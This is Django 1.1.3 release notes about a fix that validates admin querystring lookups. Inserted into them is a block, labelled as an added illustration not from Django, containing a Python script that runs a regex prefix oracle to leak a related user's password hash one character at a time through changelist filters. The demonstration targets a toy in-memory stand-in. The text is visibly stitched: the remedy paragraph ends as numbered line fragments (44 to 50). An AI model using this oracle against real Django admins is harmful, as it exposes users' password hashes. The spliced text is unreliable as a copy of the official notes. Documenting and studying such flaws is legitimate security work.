==========================
Django 1.1.3 release notes
==========================

Welcome to Django 1.1.3!

This is the third "bugfix" release in the Django 1.1 series,
improving the stability and performance of the Django 1.1 codebase.

With one exception, Django 1.1.3 maintains backwards compatibility
with Django 1.1.2. It also contains a number of fixes and other
improvements. Django 1.1.3 is a recommended upgrade for any
development or deployment currently using or targeting Django 1.1.

For full details on the new features, backwards incompatibilities, and
deprecated features in the 1.1 branch, see the :doc:`/releases/1.1`.

Backwards incompatible changes
==============================

Restricted filters in admin interface
-------------------------------------

The Django administrative interface, ``django.contrib.admin``, supports
filtering of displayed lists of objects by fields on the corresponding
models, including across database-level relationships. This is
implemented by passing lookup arguments in the querystring portion of
the URL, and options on the ``ModelAdmin`` class allow developers to
specify particular fields or relationships which will generate
automatic links for filtering.

One historically undocumented and unofficially supported feature has
been the ability for a user with sufficient knowledge of a model's
structure and the format of these lookup arguments to invent useful
new filters on the fly by manipulating the querystring.

However, it has been demonstrated that this can be abused to gain
access to information outside of an admin user's permissions; for
example, an attacker with access to the admin and sufficient knowledge
of model structure and relations could construct query strings which --
with repeated use of regular-expression lookups supported by the
Django database API -- expose sensitive information such as users'
password hashes.
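
The abuse described above works as a prefix oracle: each request asks
"does the related field start with this string?", and the only signal
the attacker needs is whether the filtered changelist comes back empty.
The following script is an added illustration, not code from the
release notes or from Django. It assumes a constructed toy schema
(``Ticket`` rows with an ``assigned_to`` relation to ``User``), made-up
password values in the Django 1.1 ``sha1$salt$hexdigest`` layout, and a
``changelist()`` stand-in that, like the admin before 1.1.3, applies
every querystring key as a lookup with no validation (only ``exact`` and
``regex`` are implemented here):

```python
import re

# Constructed sample data (not from the release notes): the admin user may
# list Ticket rows but has no permission on the user table. Password values
# follow the Django 1.1 "sha1$salt$hexdigest" layout; the digests are made up.
USERS = {
    1: {"id": 1, "username": "admin",
        "password": "sha1$a3f9c$0b7d5e8f1c2a3b4d5e6f7a8b9c0d1e2f3a4b5c6d"},
    2: {"id": 2, "username": "alice",
        "password": "sha1$17e2b$9f8e7d6c5b4a39281706f5e4d3c2b1a0f9e8d7c6"},
}
TICKETS = [
    {"id": 10, "title": "Reset printer", "assigned_to": 1},
    {"id": 11, "title": "Rotate keys", "assigned_to": 2},
]


def resolve(row, path):
    """Follow a lookup path; 'assigned_to' is the one relation in this toy schema."""
    value = row
    for attr in path:
        value = USERS[value["assigned_to"]] if attr == "assigned_to" else value[attr]
    return value


def changelist(params):
    """Stand-in for a pre-1.1.3 changelist: every querystring key is applied as
    a lookup without validation. Only 'exact' and 'regex' exist in this demo."""
    rows = TICKETS
    for key, value in params.items():
        parts = key.split("__")
        lookup = parts.pop() if parts[-1] in ("exact", "regex") else "exact"
        if lookup == "regex":
            rows = [r for r in rows if re.search(value, str(resolve(r, parts)))]
        else:
            rows = [r for r in rows if str(resolve(r, parts)) == value]
    return rows


# Characters that can appear in the target value. Because each probe is
# anchored with '^', the order only affects how many requests are needed.
ALPHABET = "0123456789abcdef$sh"


def leak(pin, target, max_len=80):
    """Recover `target` (a relation path such as 'assigned_to__password') one
    character at a time. `pin` is an exact lookup that narrows the list to a
    single row, so a non-empty result means the guessed prefix is right."""
    known = ""
    for _ in range(max_len):
        for ch in ALPHABET:
            probe = "^" + re.escape(known + ch)
            if changelist({**pin, target + "__regex": probe}):
                known += ch
                break
        else:
            break  # no character extends the prefix: the value is complete
    return known


if __name__ == "__main__":
    print(leak({"assigned_to__username": "admin"}, "assigned_to__password"))
```

With a 19-character alphabet and a 51-character hash the whole value is
recovered in well under a thousand requests, each of them an ordinary
changelist page load that the admin's permission checks never
questioned, because the attacker only ever asked to see tickets.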
    
  44. 
    
  45. To remedy this, ``django.contrib.admin`` will now validate that
    
  46. querystring lookup arguments either specify only fields on the model
    
  47. being viewed, or cross relations which have been explicitly
    
  48. allowed by the application developer using the preexisting
    
  49. mechanism mentioned above. This is backwards-incompatible for any
    
  50. users relying on the prior ability to insert arbitrary lookups.